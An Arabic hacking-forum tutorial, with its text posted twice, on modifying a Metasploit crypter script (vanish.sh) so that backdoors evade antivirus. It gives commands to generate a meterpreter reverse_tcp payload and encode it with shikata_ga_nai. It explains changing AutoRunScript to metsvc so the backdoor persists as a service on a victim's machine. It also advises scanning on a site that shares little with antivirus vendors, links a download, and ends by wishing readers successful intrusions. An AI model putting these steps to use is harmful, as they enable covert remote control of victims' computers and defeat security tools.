rss
07-01-2012, 02:50 PM
http://up.top4top.net/uploads/2012/06/24/top4top_f251bac5c82.png (http://up.top4top.net/)
قبل كل شيء . !
إن الحمد لله نحمده ونستعينه ونستغفره
ونعوذ بالله من شرور أنفسنا ومن سيئات أعمالنا
من يهده الله فلا مضل له ومن يضلل فلا هادي له
وأشهد أن لا إله إلا الله وحده لا شريك له
وأشهد أن محمدًا عبده ورسوله..
اما بعد.... :)
http://up.top4top.net/uploads/2012/06/24/top4top_f251bac5c83.png (http://up.top4top.net/)
اليوم موضوع يتكلم عن طريق التعديل على أى Script تشفير
تجده سـ,ـوآءً فى المنتدى أو خـ،ـآرجه دائماً ما تكون الطريقة وآحدة
لكنى قلت أضع لكم الطريقة حتى تصلوآ إلى الـ Clean بأنفسكم
وهذآ نظراً بالطبع لطلبآت بعض الأعضـ,ـآء ...
ولا يجب أن تكون مُجيداً للغة برمجة حتى تستطيع التعديل عليه مع انَّهُ يفضل ذلك.
الـ Clean صعباً وليس سهلاً ويحتآآج الكثير من المجهود والوقت
وبإذن الله سأضع إليكم بعض الخطوآت تسيرون على نهجها
وسنرى الكثير من Scripts التى تقوم بتشفير أى backdoor بجدآرة
والتطبيق بإذن الله سوف يكون على الـ Script الذى طرحه علينآ
أخى العزيز المجاهد الجزآئرى بآرك الله فيه وهوه vanish.sh
http://smiles.al-wed.com/smiles/13/5869rboy8ytrb1.gif
خطوآت التعديل :
1 - نسخ الـ Script أو نقله إلى مجلد الـ M3tasploit
وهذه الخطوة ليست ثآبتة ولكننآ نفعلها هنا لأن الـ Script يعتمد على الـ M3tasploit
فى تكوين الـ backdoor وتشفيره من خلال الـ encoders
وايضاً يعتمد على أدآة الـ msfcli فى بدء عمل المتنصت تلقائياً
http://img138.imageshack.us/img138/9243/eannfr.gif
2 - نعطى الصلاحيآت للـ Script حتى نستطيع أن نبدأ فى إستخدآمه
ولتنفيذ أوآمرهُ دون مشـ,ـآكل عن طريق الأمر :
كود:
chmod +x vanish.sh
ثم نقوم بفتح الـ Script بالمفكرة أى مفكرة وهُنـ,ـآ سنفتحه بالـ gedit
عن طريق الأمر :
كود:
gedit vanish.sh
كمـ,ـآ فى الصورة
http://www6.0zz0.com/2012/07/01/12/613811265.jpg
http://img138.imageshack.us/img138/9243/eannfr.gif
3 - نبحث فى الـ Script عن أمر تكوين الـ backdoor بالـ m3tasploit
والأوآآمر الخآصة بالـ encoder ولابد أنَّك فى أى Script ستجده
ومهماً كـ,ـآنت لغة البرمجة التى كُتِب بهـ،ـآ
وهنآ وجدنا ما نريد
http://www6.0zz0.com/2012/07/01/12/323847227.jpg
وحتى لا نعطب منك الـ Script وأنت تعدله يجب أن تفهم تلك الأوآمر فهماً جيداً
لنراجع معاً بعض تلك الأوآمر وتتذكروآ بإذن الله
الأمر
كود:
./msfpayload windows/meterpreter/reverse_tcp LHOST = $IP LPORT=$PORT
بالطبع هنا نعرف أن هذآ أمر تكوين الـ backdoor
وللمعلومة الـ كود:
$IP , $port
هُمَـ,ـآ رقم الـ port والـ ip الذى سألك عنهم الـ Script فى بدآية تشغيله
سوف يضعهم هُنـ,ـآ لتكوين الـ backdoor بإعداداتك
والأمر :
كود:
./msfencode -e x86/shikata_ga_nai -c $number -t raw
نعرف أن هذآ الأمر خآص بتشفير الـ backdoor بدآلة تشفير الـ shikata
لا يجب أن يحدث خطأ أثنآء الكتابة عند الحذف أو الإضآفة أو التعديل
حتى لا ينعطب الـ Script ويعطيك error
+ برجـ,ـآء عدم التعديل أو الحذف على الأمر الأخير حتى لا توآجهوآ المشآكل
وينعطب الـ Script منكم لأنه يقوم بتكوين ملف الـ C إعتماداً على آخر سطر
ايضاً تلاحظ أيضاً بعض الأوآمر المفهومة كما فى الصورة
http://www6.0zz0.com/2012/07/01/12/787911182.jpg
من خلالها نحدد مكـ,ـآن الـ backdoor الذى سوف يكون فى مجلد الـ Sh3llCodes
وكلما تعمقت فى القرآءة تجد الكثير من الأوآمر المفهومة
http://img138.imageshack.us/img138/9243/eannfr.gif
4 - التعديل على الـ Script بشكل عآم
فنجد مثلاً أن آخر سطر يعطينآ أمر لننفذه عند بدء تشغيل الـ Script
كمـ,ـآ فى الصورة
http://www6.0zz0.com/2012/07/01/13/800169141.jpg
لأن المبرمج يدرك أن هُنآلك خطأ فى الـ Script
وهوه ظهور شآشة سودآء فيصل التبليغ وإذآ أغلقهآ الضحية تنغلق الجلسة
وسنحل هذه المشكلة عن طريق إضآفة metsvc وقد شرحتهآ فى موضوع سابق
هذه سوف تقوم بتثبيت الـ backdoor كـ Service عند بدآية التشغيل
فمثلاً سوف أقوم بتغيير أمر الـ AutoRunScript
من migrate2 إلى metsvc
ولفهم المزيد برجـ,ـآء مرآجعة هذآ الموضوع
http://www.dev-point.com/vb/t304781.html (http://www.eshrag.net/vb/!304781!http://www.dev-point.com/vb/t304781.html)
http://img138.imageshack.us/img138/9243/eannfr.gif
5 - تجربة التبليغ ثم الفحص
أنصح بتجربة التبليغ أولاً لأنَّهُ أهم شئ ثم بعد ذلك الفحص
وفى الفحص أنصح بهذآ الموقع http://virusscan.jotti.org
لأنَّهُ على تحديث دائم من قبل شركآت الحماية
+ مستوآه ضعيف فى إرسآل القيم والتقارير عن تجربة
http://img138.imageshack.us/img138/9243/eannfr.gif
وفى النهـ,ـآية تحميل الـ Script من على الـ MediaFire
http://up.top4top.net/uploads/2012/06/24/top4top_f251bac5c84.png (http://www.mediafire.com/?kz37t0bvhp9t98t)
بـ,ـآسورد فك الضغط : devpoint
ملحوظة : لا تتقيد بمآ ذكرت وإنمـ,ـآ أعطيتم فقط الطريق
ويمكنك التعديل على أى Script بحرية وإذآ حدث عطب او خطأ
حاول مرة أخى وحآول حتى تصل إلى نتيجة مرضية
و إخترآقات موفقة بإذن الله تعالى :38:
إڷى هنا ۈفي نهايــۃ مۈضۈعي اڷمٺۈاضع ۈاڷبسيط
نسٺۈدعڪم اڷڷه ۈنڷٺقي بڪم في موضوع جديد
في موضوع قآدِمُ إن شَـ,ـآءَ الله
ۈاڷسڷام عڷيڪم ۈرζـمــۃ اڷڷه ۈبرڪاٺه
و الأهدآء إلى ....:44:
المجاهد الجزائرى , المتمرد المغربى , Hacker_Rafah
قبل كل شيء . !
إن الحمد لله نحمده ونستعينه ونستغفره
ونعوذ بالله من شرور أنفسنا ومن سيئات أعمالنا
من يهده الله فلا مضل له ومن يضلل فلا هادي له
وأشهد أن لا إله إلا الله وحده لا شريك له
وأشهد أن محمدًا عبده ورسوله..
اما بعد.... :)
http://up.top4top.net/uploads/2012/06/24/top4top_f251bac5c83.png (http://up.top4top.net/)
اليوم موضوع يتكلم عن طريق التعديل على أى Script تشفير
تجده سـ,ـوآءً فى المنتدى أو خـ،ـآرجه دائماً ما تكون الطريقة وآحدة
لكنى قلت أضع لكم الطريقة حتى تصلوآ إلى الـ Clean بأنفسكم
وهذآ نظراً بالطبع لطلبآت بعض الأعضـ,ـآء ...
ولا يجب أن تكون مُجيداً للغة برمجة حتى تستطيع التعديل عليه مع انَّهُ يفضل ذلك.
الـ Clean صعباً وليس سهلاً ويحتآآج الكثير من المجهود والوقت
وبإذن الله سأضع إليكم بعض الخطوآت تسيرون على نهجها
وسنرى الكثير من Scripts التى تقوم بتشفير أى backdoor بجدآرة
والتطبيق بإذن الله سوف يكون على الـ Script الذى طرحه علينآ
أخى العزيز المجاهد الجزآئرى بآرك الله فيه وهوه vanish.sh
http://smiles.al-wed.com/smiles/13/5869rboy8ytrb1.gif
خطوآت التعديل :
1 - نسخ الـ Script أو نقله إلى مجلد الـ M3tasploit
وهذه الخطوة ليست ثآبتة ولكننآ نفعلها هنا لأن الـ Script يعتمد على الـ M3tasploit
فى تكوين الـ backdoor وتشفيره من خلال الـ encoders
وايضاً يعتمد على أدآة الـ msfcli فى بدء عمل المتنصت تلقائياً
http://img138.imageshack.us/img138/9243/eannfr.gif
2 - نعطى الصلاحيآت للـ Script حتى نستطيع أن نبدأ فى إستخدآمه
ولتنفيذ أوآمرهُ دون مشـ,ـآكل عن طريق الأمر :
كود:
chmod +x vanish.sh
ثم نقوم بفتح الـ Script بالمفكرة أى مفكرة وهُنـ,ـآ سنفتحه بالـ gedit
عن طريق الأمر :
كود:
gedit vanish.sh
كمـ,ـآ فى الصورة
http://www6.0zz0.com/2012/07/01/12/613811265.jpg
http://img138.imageshack.us/img138/9243/eannfr.gif
3 - نبحث فى الـ Script عن أمر تكوين الـ backdoor بالـ m3tasploit
والأوآآمر الخآصة بالـ encoder ولابد أنَّك فى أى Script ستجده
ومهماً كـ,ـآنت لغة البرمجة التى كُتِب بهـ،ـآ
وهنآ وجدنا ما نريد
http://www6.0zz0.com/2012/07/01/12/323847227.jpg
وحتى لا نعطب منك الـ Script وأنت تعدله يجب أن تفهم تلك الأوآمر فهماً جيداً
لنراجع معاً بعض تلك الأوآمر وتتذكروآ بإذن الله
الأمر
كود:
./msfpayload windows/meterpreter/reverse_tcp LHOST = $IP LPORT=$PORT
بالطبع هنا نعرف أن هذآ أمر تكوين الـ backdoor
وللمعلومة الـ كود:
$IP , $port
هُمَـ,ـآ رقم الـ port والـ ip الذى سألك عنهم الـ Script فى بدآية تشغيله
سوف يضعهم هُنـ,ـآ لتكوين الـ backdoor بإعداداتك
والأمر :
كود:
./msfencode -e x86/shikata_ga_nai -c $number -t raw
نعرف أن هذآ الأمر خآص بتشفير الـ backdoor بدآلة تشفير الـ shikata
لا يجب أن يحدث خطأ أثنآء الكتابة عند الحذف أو الإضآفة أو التعديل
حتى لا ينعطب الـ Script ويعطيك error
+ برجـ,ـآء عدم التعديل أو الحذف على الأمر الأخير حتى لا توآجهوآ المشآكل
وينعطب الـ Script منكم لأنه يقوم بتكوين ملف الـ C إعتماداً على آخر سطر
ايضاً تلاحظ أيضاً بعض الأوآمر المفهومة كما فى الصورة
http://www6.0zz0.com/2012/07/01/12/787911182.jpg
من خلالها نحدد مكـ,ـآن الـ backdoor الذى سوف يكون فى مجلد الـ Sh3llCodes
وكلما تعمقت فى القرآءة تجد الكثير من الأوآمر المفهومة
http://img138.imageshack.us/img138/9243/eannfr.gif
4 - التعديل على الـ Script بشكل عآم
فنجد مثلاً أن آخر سطر يعطينآ أمر لننفذه عند بدء تشغيل الـ Script
كمـ,ـآ فى الصورة
http://www6.0zz0.com/2012/07/01/13/800169141.jpg
لأن المبرمج يدرك أن هُنآلك خطأ فى الـ Script
وهوه ظهور شآشة سودآء فيصل التبليغ وإذآ أغلقهآ الضحية تنغلق الجلسة
وسنحل هذه المشكلة عن طريق إضآفة metsvc وقد شرحتهآ فى موضوع سابق
هذه سوف تقوم بتثبيت الـ backdoor كـ Service عند بدآية التشغيل
فمثلاً سوف أقوم بتغيير أمر الـ AutoRunScript
من migrate2 إلى metsvc
ولفهم المزيد برجـ,ـآء مرآجعة هذآ الموضوع
http://www.dev-point.com/vb/t304781.html (http://www.eshrag.net/vb/!304781!http://www.dev-point.com/vb/t304781.html)
http://img138.imageshack.us/img138/9243/eannfr.gif
5 - تجربة التبليغ ثم الفحص
أنصح بتجربة التبليغ أولاً لأنَّهُ أهم شئ ثم بعد ذلك الفحص
وفى الفحص أنصح بهذآ الموقع http://virusscan.jotti.org
لأنَّهُ على تحديث دائم من قبل شركآت الحماية
+ مستوآه ضعيف فى إرسآل القيم والتقارير عن تجربة
http://img138.imageshack.us/img138/9243/eannfr.gif
وفى النهـ,ـآية تحميل الـ Script من على الـ MediaFire
http://up.top4top.net/uploads/2012/06/24/top4top_f251bac5c84.png (http://www.mediafire.com/?kz37t0bvhp9t98t)
بـ,ـآسورد فك الضغط : devpoint
ملحوظة : لا تتقيد بمآ ذكرت وإنمـ,ـآ أعطيتم فقط الطريق
ويمكنك التعديل على أى Script بحرية وإذآ حدث عطب او خطأ
حاول مرة أخى وحآول حتى تصل إلى نتيجة مرضية
و إخترآقات موفقة بإذن الله تعالى :38:
إڷى هنا ۈفي نهايــۃ مۈضۈعي اڷمٺۈاضع ۈاڷبسيط
نسٺۈدعڪم اڷڷه ۈنڷٺقي بڪم في موضوع جديد
في موضوع قآدِمُ إن شَـ,ـآءَ الله
ۈاڷسڷام عڷيڪم ۈرζـمــۃ اڷڷه ۈبرڪاٺه
و الأهدآء إلى ....:44:
المجاهد الجزائرى , المتمرد المغربى , Hacker_Rafah